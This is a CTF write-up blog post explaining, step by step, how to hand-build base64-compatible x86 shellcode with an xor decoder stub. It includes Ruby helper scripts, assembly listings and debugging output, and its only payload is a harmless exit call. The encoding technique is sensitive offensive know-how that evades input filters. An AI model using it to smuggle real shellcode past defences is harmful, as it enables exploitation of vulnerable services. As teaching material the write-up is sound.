Hey everybody,

A couple months ago, we ran BSides San Francisco CTF. It was fun, and I posted blogs about it at the time, but I wanted to do a late writeup for the level b-64-b-tuff.

The challenge was to write base64-compatible shellcode. There's an easy solution - using an alphanumeric encoder - but what's the fun in that? (Also, I didn't think of it. :) ) I'm going to cover base64, but these exact same principles apply to alphanumeric - there's absolutely no reason you couldn't change the SET variable in my examples and generate alphanumeric shellcode.

In this post, we're going to write a base64 decoder stub by hand, which encodes some super simple shellcode. I'll also post a link to a tool I wrote to automate this.

I can't promise that this is the best, or the easiest, or even a sane way to do this. I came up with this process all by myself, but I have to imagine that the generally available encoders do basically the same thing. :)



Intro to Shellcode

I don't want to dwell too much on the basics, so I highly recommend reading PRIMER.md, which is a primer on assembly code and shellcode that I recently wrote for a workshop I taught.

The idea behind the challenge was that you sent the server arbitrary binary data. That data was encoded into base64, and the base64 string was then run as if it were machine code. That meant your machine code had to be made up of characters in the set [a-zA-Z0-9+/]. You could also have an equal sign ("=") or two on the end, but that's not really useful.
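Since we'll be checking "is this all base64?" over and over, here's a minimal Ruby sketch of that check. The helper name base64_compatible? is made up for illustration; SET is the same alphabet string used in the scripts later in this post.

```ruby
# The characters the challenge lets through: the standard base64 alphabet.
SET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'

# Hypothetical helper: true if every byte of `code` is in SET.
def base64_compatible?(code)
  allowed = SET.bytes
  code.bytes.all? { |b| allowed.include?(b) }
end

puts base64_compatible?('hAAAAX')                  # push 0x41414141 / pop eax
puts base64_compatible?("\xb8\x01\x00\x00\x00".b)  # mov eax, 1
```

The first line prints true and the second prints false, since 0xb8 and the NUL bytes are outside the set.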

We're going to mostly focus on how to write base64-compatible shellcode, then bring it back to the challenge at the very end.

Assembly instructions

Since each assembly instruction has a 1:1 relationship to the machine code it generates, it'd be helpful to us to get a list of all instructions we have available that stay within the base64 character set.

To get an idea of which instructions are available, I wrote a quick Ruby script that would attempt to disassemble every possible combination of two characters followed by some static data.

I originally did this by scripting out to ndisasm on the commandline, a tool that we'll see used throughout this blog, but I didn't keep that code. Instead, I'm going to use the Crabstone Disassembler, which is Ruby bindings for Capstone:

require 'crabstone'

SET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'

cs = Crabstone::Disassembler.new(Crabstone::ARCH_X86, Crabstone::MODE_32)

SET.chars.each do |c1|
  SET.chars.each do |c2|
    # Two candidate bytes, followed by static data to fill in any operands
    data = c1 + c2 + ("A" * 14)
    instruction = cs.disasm(data, 0)[0]

    puts "%s %s %s" % [
      instruction.bytes.map() { |b| '%02x' % b }.join(' '),
      instruction.mnemonic.to_s,
      instruction.op_str.to_s
    ]
  end
end

I'd probably do it considerably more tersely in irb if I was actually solving a challenge rather than writing a blog, but you get the idea. :)

Anyway, running that produces quite a lot of output. We can feed it through sort + uniq to get a much shorter version.

From there, I manually went through the full 2000+ element list to figure out what might actually be useful (since the vast majority were basically identical, that's easier than it sounds). I moved all the good stuff to the top and got rid of the stuff that's useless for writing a decoder stub. That left me with this list. I left in a bunch of stuff (like multiply instructions) that probably wouldn't be useful, but that I didn't want to completely discount.

Dealing with a limited character set

When you write shellcode, there are a few things you have to do. At a minimum, you almost always have to change registers to fairly arbitrary values (like a command to execute, a file to read/write, etc) and make syscalls ("int 0x80" in assembly or "\xcd\x80" in machine code; we'll see how that winds up being the most problematic piece!).

For the purposes of this blog, we're going to have 12 bytes of shellcode: a simple call to the sys_exit() syscall, with a return code of 0x41414141. The reason is, it demonstrates all the fundamental concepts (setting variables and making syscalls), and is easy to verify as correct using strace.

Here's the shellcode we're going to be working with:

mov eax, 0x01
mov ebx, 0x41414141
int 0x80

We'll be using this code throughout, so make sure you have a pretty good grasp of it! It assembles as follows (on Ubuntu, if this fails, try apt-get install nasm):

$ echo -e 'bits 32\n\nmov eax, 0x01\nmov ebx, 0x41414141\nint 0x80\n' > file.asm; nasm -o file file.asm
$ hexdump -C file
00000000 b8 01 00 00 00 bb 41 41 41 41 cd 80 |............|

If you want to try running it, you can use my run_raw_code.c utility (there are plenty just like it):

$ strace ./run_raw_code file
[...]
read(3, "\270\1\0\0\0\273AAAA\315\200", 12) = 12
exit(1094795585) = ?

The read() call is where the run_raw_code stub is reading the shellcode file. The 1094795585 in exit() is the 0x41414141 that we gave it. We're going to see that value again and again and again, as we evaluate the correctness of our code, so get used to it!
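If you want to convince yourself of that conversion, a couple of lines of Ruby will do it. This is just arithmetic; the constant name EXIT_CODE is made up for the example. It also shows the low byte, which is all the parent process gets to see as the exit status on Linux.

```ruby
# The value we pass to sys_exit in ebx.
EXIT_CODE = 0x41414141

puts EXIT_CODE                 # the decimal form strace prints
puts EXIT_CODE & 0xff          # the low byte, i.e. the visible exit status
puts '0x%02x' % (EXIT_CODE & 0xff)
```

That prints 1094795585, 65, and 0x41.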

You can also prove that it disassembles properly, and see what each line becomes using the ndisasm utility (this is part of the nasm package):

$ ndisasm -b32 file
00000000  B801000000        mov eax,0x1
00000005  BB41414141        mov ebx,0x41414141
0000000A  CD80              int 0x80

Easy stuff: NUL byte restrictions

Let's take a quick look at a simple character restriction: NUL bytes. It's commonly seen because NUL bytes represent string terminators. Functions like strcpy() stop copying when they reach a NUL. Unlike base64, this can be done by hand!

It's usually pretty straightforward to get rid of NUL bytes by just looking at where they appear and fixing them. They're almost always caused by 32-bit moves or values, so we can switch to 8-bit moves (eax is 32 bits; al, the low byte of eax, is 8 bits) or, as in this version, clear the register with xor and then increment it:

xor eax, eax
inc eax
mov ebx, 0x41414141
int 0x80

We can prove this works, as well (I'm going to stop showing the echo as code gets more complex, but I use file.asm throughout):

$ echo -e 'bits 32\n\nxor eax, eax\ninc eax\nmov ebx, 0x41414141\nint 0x80\n' > file.asm; nasm -o file file.asm
$ hexdump -C file
00000000 31 c0 40 bb 41 41 41 41 cd 80 |1.@.AAAA..|

Simple!

Clearing eax in base64

Something else to note: our shellcode is now largely base64! Let's look at the disassembled version so we can see where the problems are:

$ ndisasm -b32 file
00000000  31C0              xor eax,eax
00000002  40                inc eax
00000003  BB41414141        mov ebx,0x41414141
00000008  CD80              int 0x80

Okay, maybe we aren't so close: none of these lines is actually compatible. Even "inc eax", which assembles to a printable '@', falls outside the base64 set. I guess we can start the long journey!

Let's start by looking at how we can clear eax using our instruction set. We have a few promising instructions for changing eax, but these are the ones I like best:

35 ?? ?? ?? ?? xor eax,0x????????

68 ?? ?? ?? ?? push dword 0x????????

58 pop eax

Let's start with the most naive approach:

push 0
pop eax

If we assemble that, we get:

00000000  6A00              push byte +0x0
00000002  58                pop eax

Close! But because we're pushing 0, we end up with a NUL byte. So let's push something else:

push 0x41414141
pop eax

If we look at how that assembles, we get:

00000000 68 41 41 41 41 58 |hAAAAX|

Not only is it all base64-compatible now, it also spells "hAAAAX", which is a fun coincidence. :)

The problem is, eax doesn't end up as 0, it's 0x41414141. You can verify this by adding "int 3" at the bottom, dumping a corefile, and loading it in gdb. Feel free to use this trick throughout if you're following along; I'm using it constantly to verify my code snippets, but I'll only show it when the values are important:

$ ulimit -c unlimited
$ rm core
$ cat file.asm
bits 32
push 0x41414141
pop eax
int 3
$ nasm -o file file.asm
$ ./run_raw_code ./file
allocated 8 bytes of executable memory at: 0x41410000
fish: “./run_raw_code ./file” terminated by signal SIGTRAP (Trace or breakpoint trap)
$ gdb ./run_raw_code ./core
Core was generated by `./run_raw_code ./file`.
Program terminated with signal SIGTRAP, Trace/breakpoint trap.
(gdb) print/x $eax
$1 = 0x41414141

Anyway, if we don't like the value, we can xor a value with eax, provided that the value is also base64-compatible! So let's do that:

push 0x41414141
pop eax
xor eax, 0x41414141

Which assembles to:

00000000 68 41 41 41 41 58 35 41 41 41 41 |hAAAAX5AAAA|

All right! You can verify using the debugger that, at the end, eax is, indeed, 0.

Encoding an arbitrary value in eax

If we can set eax to 0, does that mean we can set it to anything?

Since xor works at the byte level, the better question is: can you xor two base-64-compatible bytes together, and wind up with any byte?

Turns out, the answer is no. Not quite. Let's look at why!

We'll start by trying a pure bruteforce (this code is essentially from my solution):

SET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';

def find_bytes(b)
  SET.bytes.each do |b1|
    SET.bytes.each do |b2|
      if((b1 ^ b2) == b)
        return [b1, b2]
      end
    end
  end

  puts("Error: Couldn't encode 0x%02x!" % b)
  return nil
end

0.upto(255) do |i|
  puts("%x => %s" % [i, find_bytes(i)])
end

The full output is here, but the summary is:

0 => [65, 65]
1 => [66, 67]
2 => [65, 67]
3 => [65, 66]
...
7d => [68, 57]
7e => [70, 56]
7f => [70, 57]
Error: Couldn't encode 0x80!
80 =>
Error: Couldn't encode 0x81!
81 =>
Error: Couldn't encode 0x82!
82 =>
...

Basically, we can encode any value that doesn't have the most-significant bit set (ie, anything under 0x80). That's going to be a problem that we'll deal with much, much later.
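The reason is simple once you look at the alphabet: every base64 character is below 0x80, so the top bit is clear in both operands and xor can never set it. Here's a quick Ruby sketch that checks this by building every reachable xor result; REACHABLE is a name I made up for the example.

```ruby
SET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'

# Every value we can get by xoring two characters from the set.
REACHABLE = SET.bytes.product(SET.bytes).map { |a, b| a ^ b }.uniq.sort

puts SET.bytes.all? { |b| b < 0x80 }   # no character has its top bit set
puts '0x%02x' % REACHABLE.max          # so no xor result has it either
```

This prints true and 0x7f.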

Since many of our instructions operate on 4-byte values, not 1-byte values, we want to operate in 4-byte chunks. Fortunately, xor is byte-by-byte, so we just need to treat it as four individual bytes:

def get_xor_values_32(desired)
  # Split the 32-bit value into its four bytes
  b1, b2, b3, b4 = [desired].pack('N').bytes()

  v1 = find_bytes(b1)
  v2 = find_bytes(b2)
  v3 = find_bytes(b3)
  v4 = find_bytes(b4)

  # Reassemble the first and second halves of each byte pair into integers
  result = [
    [v1[0], v2[0], v3[0], v4[0]].pack('cccc').unpack('N').pop(),
    [v1[1], v2[1], v3[1], v4[1]].pack('cccc').unpack('N').pop(),
  ]

  puts '0x%08x' % result[0]
  puts '0x%08x' % result[1]
  puts('----------')
  puts('0x%08x' % (result[0] ^ result[1]))
  puts()

  return result
end

This function takes a single 32-bit value and it outputs the two xor values (note that this won't work when the most significant bit is set... stay tuned for that!):

irb(main):039:0> get_xor_values_32(0x01020304)
0x42414141
0x43434245
----------
0x01020304

=> [1111572801, 1128481349]

irb(main):040:0> get_xor_values_32(0x41414141)
0x6a6a6a6a
0x2b2b2b2b
----------
0x41414141

=> [1785358954, 724249387]

And so on.

So if we want to set eax to 0x00000001 (for the sys_exit syscall), we can simply feed it into this code and convert it to assembly:

get_xor_values_32(0x01)
0x41414142
0x41414143
----------
0x00000001

=> [1094795586, 1094795587]

Then write the shellcode:

push 0x41414142
pop eax
xor eax, 0x41414143

And prove to ourselves that it's base-64-compatible; I believe in doing this, because every once in a while an instruction like "inc eax" (which becomes '@') will slip in when I'm not paying attention:

$ hexdump -C file
00000000 68 42 41 41 41 58 35 43 41 41 41 |hBAAAX5CAAA|

We'll be using that exact pattern a lot - push (value) / pop eax / xor eax, (other value). It's the most fundamental building block of this project!
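Because the pattern is so regular, you can also emit the machine code for it directly. Here's a rough Ruby sketch; the method name set_eax is hypothetical, and the opcodes (68 for push dword, 58 for pop eax, 35 for xor eax) are the ones from the instruction list above.

```ruby
# Hypothetical helper: machine code for
#   push first / pop eax / xor eax, second
# Operands are packed as 32-bit little-endian values.
def set_eax(first, second)
  "\x68".b + [first].pack('V') +    # push dword first
    "\x58".b +                      # pop eax
    "\x35".b + [second].pack('V')   # xor eax, second
end

puts set_eax(0x41414142, 0x41414143)
```

That prints hBAAAX5CAAA, the same bytes nasm gave us.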

Setting other registers

Sadly, unless I missed something, there's no easy way to set other registers. We can increment or decrement them, and we can pop values off the stack into some of them, but we don't have the ability to xor, mov, or anything else useful!

There are basically three registers that we have easy access to:

58 pop eax

59 pop ecx

5A pop edx

So to set ecx to an arbitrary value, we can do it via eax:

push 0x41414142
pop eax
xor eax, 0x41414143
push eax
pop ecx

Then verify the base64-ness:

$ hexdump -C file
00000000 68 42 41 41 41 58 35 43 41 41 41 50 59 |hBAAAX5CAAAPY|

Unfortunately, if we try the same thing with ebx, we hit a non-base64 character:

$ hexdump -C file
00000000 68 42 41 41 41 58 35 43 41 41 41 50 5b |hBAAAX5CAAAP[|

Note the "[" at the end - that's not in our character set! So we're pretty much limited to using eax, ecx, and edx for most things.

But wait, there's more! We do, however, have access to popad. The popad instruction pops the next 8 values off the stack into the 8 general-purpose registers (the value popped for esp is discarded rather than loaded). It's a bit of a scorched-earth method, though, because it overwrites all the other registers. We're going to use it at the start of our code to zero-out all the registers.

Let's try to convert our exit shellcode from earlier:

mov eax, 0x01
mov ebx, 0x41414141
int 0x80

Into something that's base-64 friendly:

push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
popad
push 0x41414142
pop eax
xor eax, 0x41414143
int 0x80

Prove that it uses only base64 characters (except the syscall):

$ hexdump -C file
00000000 68 41 41 41 41 68 41 41 41 41 68 41 41 41 41 68 |hAAAAhAAAAhAAAAh|
00000010 41 41 41 41 68 41 41 41 41 68 41 41 41 41 68 41 |AAAAhAAAAhAAAAhA|
00000020 41 41 41 68 41 41 41 41 61 68 42 41 41 41 58 35 |AAAhAAAAahBAAAX5|
00000030 43 41 41 41 cd 80 |CAAA..|

And prove that it still works:

$ strace ./run_raw_code ./file
...
read(3, "hAAAAhAAAAhAAAAhAAAAhAAAAhAAAAhA"..., 54) = 54
exit(1094795585) = ?

Encoding the actual code

You've probably noticed by now: this is a lot of work. Especially if you want to set each register to a different non-base64-compatible value! You have to encode each value by hand, making sure you set eax last (because it's our working register). And what if you need an instruction (like add, or shift) that isn't available? Do we just simulate it?

As I'm sure you've noticed, the machine code is just a bunch of bytes. What's stopping us from simply encoding the machine code rather than just values?

Let's take our original example of an exit again:

mov eax, 0x01
mov ebx, 0x41414141
int 0x80

Because 'mov' assembles to 0xb8XXXXXX, I don't want to deal with that yet (the most-significant bit is set). So let's change it a bit to keep each byte (besides the syscall) under 0x80:

00000000  6A01              push byte +0x1
00000002  58                pop eax
00000003  6841414141        push dword 0x41414141
00000008  5B                pop ebx

Or, as a string of bytes:

"\x6a\x01\x58\x68\x41\x41\x41\x41\x5b"

Let's pad that to a multiple of 4 so we can encode in 4-byte chunks (we pad with 'A', because it's as good a character as any):

"\x6a\x01\x58\x68\x41\x41\x41\x41\x5b\x41\x41\x41"

Then break that string into 4-byte chunks, reading each chunk as a little-endian integer (reverse byte order):

6a 01 58 68 -> 0x6858016a

41 41 41 41 -> 0x41414141

5b 41 41 41 -> 0x4141415b
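If you'd rather not reverse bytes in your head, Ruby's unpack does the padding-and-chunking step in a couple of lines. This is only a sketch; SHELLCODE and to_chunks are names I picked for the example.

```ruby
# push 1 / pop eax / push 0x41414141 / pop ebx, as raw bytes
SHELLCODE = "\x6a\x01\x58\x68\x41\x41\x41\x41\x5b".b

# Hypothetical helper: pad with 'A' to a multiple of 4 bytes, then read
# each 4-byte chunk as a 32-bit little-endian integer ('V').
def to_chunks(code)
  padded = code + 'A' * (-code.bytesize % 4)
  padded.unpack('V*')
end

to_chunks(SHELLCODE).each { |v| puts '0x%08x' % v }
```

That prints 0x6858016a, 0x41414141 and 0x4141415b, matching the values above.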

Then run each of those values through our get_xor_values_32() function from earlier:

irb(main):047:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x6858016a)
0x43614241 ^ 0x2b39432b

irb(main):048:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x41414141)
0x6a6a6a6a ^ 0x2b2b2b2b

irb(main):050:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x4141415b)
0x6a6a6a62 ^ 0x2b2b2b39

Let's start our decoder by simply calculating each of these values in eax, just to prove that they're all base64-compatible (note that we are simply discarding the values in this example, we aren't doing anything with them quite yet):

push 0x43614241
pop eax
xor eax, 0x2b39432b

push 0x6a6a6a6a
pop eax
xor eax, 0x2b2b2b2b

push 0x6a6a6a62
pop eax
xor eax, 0x2b2b2b39

Which assembles to:

$ hexdump -Cv file
00000000 68 41 42 61 43 58 35 2b 43 39 2b 68 6a 6a 6a 6a |hABaCX5+C9+hjjjj|
00000010 58 35 2b 2b 2b 2b 68 62 6a 6a 6a 58 35 39 2b 2b |X5++++hbjjjX59++|
00000020 2b |+|

Looking good so far!

Decoder stub

Okay, we've proven that we can encode instructions (without the most significant bit set)! Now we actually want to run it!

Basically: our shellcode is going to start with a decoder, followed by a bunch of encoded bytes. We'll also throw some padding in between to make this easier to do by hand. The entire decoder has to be made up of base64-compatible bytes, but the encoded payload (ie, the shellcode) has no restrictions.

So now we actually want to alter the shellcode in memory (self-rewriting code!). We need an instruction to do that, so let's look back at the list of available instructions! After some searching, I found one that's promising:

31 51 ?? xor [ecx+0x??],edx

This command xors the 32-bit value at memory address ecx+0x?? with edx. We know we can easily control ecx (push (value) / pop eax / xor (other value) / push eax / pop ecx) and, similarly, edx. Since the "0x??" value has to also be a base64 character, we'll follow our trend and use [ecx+0x41], which gives us:

31 51 41 xor [ecx+0x41],edx

Once I found that command, things started coming together! Since I can control eax, ecx, and edx pretty cleanly, that's basically the perfect instruction to decode our shellcode in-memory!

This is somewhat complex, so let's start by looking at the steps involved:

1. Load the encoded shellcode (half of the xor pair, ie, the return value from get_xor_values_32()) into a known memory address (in our case, it's going to be 0x141 bytes after the start of our code)
2. Set ecx to the value that's 0x41 bytes before that encoded shellcode (0x100)
3. For each 32-bit pair in the encoded shellcode...
   - Load the other half of the xor pair into edx
   - Do the xor to alter it in-memory (ie, decode it back to the original, unencoded value)
   - Increment ecx to point at the next value
   - Repeat for the full payload
4. Run the newly decoded payload
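Before doing this in assembly, it can help to model the steps in Ruby. The sketch below is only a simulation, not the decoder itself: PAIRS holds the xor pairs we computed earlier for the exit shellcode (the first half goes into edx, the second half is what sits in memory), and ECX_START is the xor pair I'm assuming for ecx, given a load address of 0x41410000. The names are made up for the example.

```ruby
# [value loaded into edx, value stored in memory] for each 4-byte chunk
PAIRS = [
  [0x43614241, 0x2b39432b],
  [0x6a6a6a6a, 0x2b2b2b2b],
  [0x6a6a6a62, 0x2b2b2b39],
]

# ecx is built from two base64-compatible values, like everything else.
ECX_START = 0x6a6a4241 ^ 0x2b2b4341

# Simulate "xor [ecx+0x41], edx" for each chunk and return the decoded bytes.
def decode(pairs)
  pairs.map { |in_edx, in_memory| in_memory ^ in_edx }.pack('V*')
end

puts '0x%08x' % ECX_START            # 0x41410100
puts '0x%08x' % (ECX_START + 0x41)   # 0x41410141, where the payload lives
puts decode(PAIRS).bytes.map { |b| '%02x' % b }.join(' ')
```

The last line prints 6a 01 58 68 41 41 41 41 5b 41 41 41, which is the padded shellcode we started with.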

For the sake of our sanity, we're going to make some assumptions in the code: first, our code is loaded to the address 0x41410000 (which it is, for this challenge). Second, the decoder stub is exactly 0x141 bytes long (we will pad it to get there). Either of these can be easily worked around, but it's not necessary to do the extra work in order to grok the decoder concept.

Recall that for our sys_exit shellcode, the xor pairs we determined were: 0x43614241 ^ 0x2b39432b, 0x6a6a6a6a ^ 0x2b2b2b2b, and 0x6a6a6a62 ^ 0x2b2b2b39.

Here's the code:

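; Set ecx to 0x41410100 (0x41 bytes before the start of the encoded shellcode)
push 0x6a6a4241
pop eax
xor eax, 0x2b2b4341 ; 0x6a6a4241 ^ 0x2b2b4341 = 0x41410100
push eax
pop ecx

; Decode the first 4 bytes
push 0x43614241
pop edx
xor [ecx+0x41], edx

; Move ecx to the next 4 bytes
inc ecx
inc ecx
inc ecx
inc ecx

; Decode the second 4 bytes
push 0x6a6a6a6a
pop edx
xor [ecx+0x41], edx

; Move ecx to the next 4 bytes
inc ecx
inc ecx
inc ecx
inc ecx

; Decode the third 4 bytes
push 0x6a6a6a62
pop edx
xor [ecx+0x41], edx

; Padding, so the encoded shellcode starts at offset 0x141
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAA'

; Now, the second halves of our xor pairs
dd 0x2b39432b
dd 0x2b2b2b2b
dd 0x2b2b2b39

; The syscall itself, which isn't base64-compatible yet
int 0x80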

All right! Here's what it gives us; note that other than the syscall at the end (we'll get to that, I promise!), it's all base64:

$ hexdump -Cv file
00000000 68 41 42 6a 6a 58 35 41 43 2b 2b 50 59 68 41 42 |hABjjX5AC++PYhAB|
00000010 61 43 5a 31 51 41 41 41 41 41 68 6a 6a 6a 6a 5a |aCZ1QAAAAAhjjjjZ|
00000020 31 51 41 41 41 41 41 68 62 6a 6a 6a 5a 31 51 41 |1QAAAAAhbjjjZ1QA|
00000030 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000050 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000060 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000070 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000080 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000090 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
000000a0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
000000b0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
000000c0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
000000d0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
000000e0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
000000f0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000100 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000110 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000120 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000130 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000140 41 2b 43 39 2b 2b 2b 2b 2b 39 2b 2b 2b cd 80 |A+C9+++++9+++..|

To run this, we have to patch run_raw_code.c to load the code to the correct address:

diff --git a/forensics/ximage/solution/run_raw_code.c b/forensics/ximage/solution/run_raw_code.c
index 9eadd5e..1ad83f1 100644
--- a/forensics/ximage/solution/run_raw_code.c
+++ b/forensics/ximage/solution/run_raw_code.c
@@ -12,7 +12,7 @@ int main(int argc, char *argv[]){
 exit(0);
 }
- void * a = mmap(0, statbuf.st_size, PROT_EXEC |PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0);
+ void * a = mmap(0x41410000, statbuf.st_size, PROT_EXEC |PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0);
 printf("allocated %d bytes of executable memory at: %p\n", statbuf.st_size, a);
 FILE *file = fopen(argv[1], "rb");

You'll also have to compile it in 32-bit mode:

$ gcc -m32 -o run_raw_code run_raw_code.c

Once that's done, give 'er a shot:

$ strace ~/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./file
[...]
read(3, "hABjjX5AC++PYhABaCZ1QAAAAAhjjjjZ"..., 335) = 335
exit(1094795585) = ?

We did it, team!

If we want to actually inspect the code, we can change the very last padding 'A' into 0xcc (aka, int 3, or a SIGTRAP):

$ diff -u file.asm file-trap.asm
--- file.asm 2017-06-11 13:17:57.766651742 -0700
+++ file-trap.asm 2017-06-11 13:17:46.086525100 -0700
@@ -45,7 +45,7 @@
 db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
 db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
 db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
-db 'AAAAAAAAAAAAAAAAA'
+db 'AAAAAAAAAAAAAAAA', 0xcc

 ; Now, the second halves of our xor pairs
 dd 0x2b39432b

And run it with corefiles enabled:

$ nasm -o file file.asm
$ ulimit -c unlimited
$ ~/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./file
allocated 335 bytes of executable memory at: 0x41410000
fish: “~/projects/ctf-2017-release/for...” terminated by signal SIGTRAP (Trace or breakpoint trap)
$ gdb ~/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./core
Core was generated by `/home/ron/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./fi`.
Program terminated with signal SIGTRAP, Trace/breakpoint trap.
(gdb) x/10i $eip
=> 0x41410141: push 0x1
   0x41410143: pop eax
   0x41410144: push 0x41414141
   0x41410149: pop ebx
   0x4141014a: inc ecx
   0x4141014b: inc ecx
   0x4141014c: inc ecx
   0x4141014d: int 0x80
   0x4141014f: add BYTE PTR [eax],al
   0x41410151: add BYTE PTR [eax],al

As you can see, our original shellcode is properly decoded! (The inc ecx instructions you're seeing are our padding.)

The decoder stub and encoded shellcode can be generated programmatically quite easily, which beats doing it by hand, because the manual process is extremely error prone. It took me 4 tries to get it right: I messed up the start address, I compiled run_raw_code in 64-bit mode, and I got the endianness backwards before I finally got it right. That doesn't sound so bad, except that I had to go back and re-write part of this section and re-run most of the commands to get the proper output each time. :)

That pesky most-significant-bit

So, I've been avoiding this, because I don't think I solved it in a very elegant way. But, my solution works, so I guess that's something. :)

As usual, we start by looking at our set of available instructions to see what we can use to set the most significant bit (let's start calling it the "MSB" to save my fingers).

Unfortunately, the easy stuff can't help us; xor can only set it if it's already set somewhere, we don't have any shift instructions, inc would take forever, and the subtract and multiply instructions could probably work, but it would be tricky.

Let's start with a simple case: can we set edx to 0x80?

First, let's set edx to the highest value we can, 0x7F (we choose edx because a) it's one of the three registers we can easily pop into; b) eax is our working variable since it's the only one we can xor; and c) we don't want to change ecx once we start going, since it points to the memory we're decoding):

irb(main):057:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x0000007F)
0x41414146 ^ 0x41414139

Using those values and our old push / pop / xor pattern, followed by a single inc, we can set edx to 0x80:

push 0x41414146
pop eax
xor eax, 0x41414139 ; eax is now 0x7F
push eax
pop edx
inc edx ; edx is now 0x80

That works out to:

00000000 68 46 41 41 41 58 35 39 41 41 41 50 5a 42 |hFAAAX59AAAPZB|

So far so good! Now we can do our usual xor to set that one bit in our decoded code:

xor [ecx+0x41], edx

Since edx is 0x80, this flips the MSB of the byte at ecx+0x41 (the lowest byte of the chunk we're currently decoding). That bit is always clear in the MSB-free value we decoded, so it ends up set.

If we were decoding a single byte at a time, we'd be done. Unfortunately, we aren't so lucky - we're working in 32-bit (4-byte) chunks.

Setting edx to 0x00008000, 0x00800000, or 0x80000000

So how do we set edx to 0x00008000, 0x00800000, or 0x80000000 without having a shift instruction?

This is where I introduce a pretty ugly hack. In effect, we use some stack shenanigans to perform a poor-man's shift. This won't work on most non-x86/x64 systems, because they require a word-aligned stack (I was actually a little surprised it worked on x86, to be honest!).

Let's say we want 0x00008000. Let's just look at the code:

push 0x41414141
pop eax
xor eax, 0x41414141
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
popad

push 0x41414146
pop eax
xor eax, 0x41414139
push eax
pop edx
inc edx

push edi
push edx
dec esp
pop edx
inc esp

int 3

And we can use gdb to prove it works with the same trick as before:

$ nasm -o file file.asm
$ rm -f core
$ ulimit -c unlimited
$ ./run_raw_code ./file
allocated 41 bytes of executable memory at: 0x41410000
fish: “~/projects/ctf-2017-release/for...” terminated by signal SIGTRAP (Trace or breakpoint trap)
$ gdb ./run_raw_code ./core
Program terminated with signal SIGTRAP, Trace/breakpoint trap.
(gdb) print/x $edx
$1 = 0x8000

We can do basically the exact same thing to set the third byte:

push edi
push edx
dec esp
dec esp
pop edx
inc esp
inc esp

And the fourth:

push edi
push edx
dec esp
dec esp
dec esp
pop edx
inc esp
inc esp
inc esp
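To see why the dec esp / pop edx dance acts like a left shift by whole bytes, here's a small Ruby model of the stack. It's only a sketch: the method name shifted_edx is made up, the stack is just a byte array, and it assumes the bytes sitting just below the pushed value are zero, which appears to hold in the listing above since it starts by pushing eight zeros.

```ruby
# Hypothetical model: the stack is a byte array and esp is an index into it.
# Assumption: the bytes just below the pushed values are zero.
def shifted_edx(edx, dec_count)
  stack = Array.new(16, 0)
  esp = stack.size

  esp -= 4                                    # push edi (0 after popad)
  stack[esp, 4] = [0].pack('V').bytes
  esp -= 4                                    # push edx
  stack[esp, 4] = [edx].pack('V').bytes

  esp -= dec_count                            # dec esp, once per byte of shift
  stack[esp, 4].pack('C4').unpack('V').first  # pop edx reads 4 bytes from here
end

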